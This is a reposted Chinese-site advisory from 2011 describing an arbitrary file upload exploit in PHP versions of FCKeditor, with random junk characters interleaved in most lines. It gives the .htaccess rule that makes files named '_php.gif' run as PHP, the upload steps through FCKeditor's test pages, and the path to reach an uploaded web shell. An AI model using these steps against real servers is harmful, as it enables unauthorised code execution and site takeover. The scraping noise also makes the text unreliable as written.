FCKeditor所有php版本Upload上传漏洞
" g% v0 H7 c- i5 b作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
6 N$ C, K. g7 \0 |5 h减小字体 增大字体
" x" ]; H$ t- C; w% W5 l# b[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability0 M4 Y, |( r7 [/ [5 L+ G+ Z
[+] Date: 2011
" b A" h4 j+ p) E3 ~[+] Author : sinesafe.cn% B' z* n, H2 M1 E/ P
[+] Website : WwW.sinesafe.cn7 U1 m- h0 I. Y1 S
——————————————————— \( ^" T0 C/ Y( `4 B* }+ h
1.create a htaccess file:
* J) I) Y; C4 g" l5 M+ R" z% vcode:
- g% ^0 R7 }" U7 {<FilesMatch “_php.gif”>8 y. J2 X3 k W4 z2 V1 M2 T
SetHandler application/x-httpd-php2 i, k2 e/ B% d
</FilesMatch>3 m2 H" g0 K6 S( Q: H1 \
m, {# [! H s+ ^6 q' [9 Y
2.Now upload this htaccess with FCKeditor.7 \% Y: D6 G; o
: R2 }$ f! K& ^4 p$ `, Q/ I% nhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
' g, V7 L. K+ f3 A, d" A, `: i! ^4 t8 b! z& L
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
; b r0 v. W& o/ P. Q. K) B$ D' z7 _% v7 a |1 \+ t% z
———————————————————————————————-
/ _$ h- z; u" L$ F/ B3.Now upload shell.php.gif with FCKeditor.
0 U: ]) Z1 f7 h9 Z4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically., |: S* M3 b1 k- w3 x3 T- N
5.http://www.sinesafe.cn/anything/shell_php.gif
; \1 ~& g% w- s6.Now shell is available from server. |
) \, i6 q$ t) ?" j! J! n6 E9 f$ q0 e Y- n: W0 B( D/ w3 K
. c! l! Q( l0 i" a. _+ r
|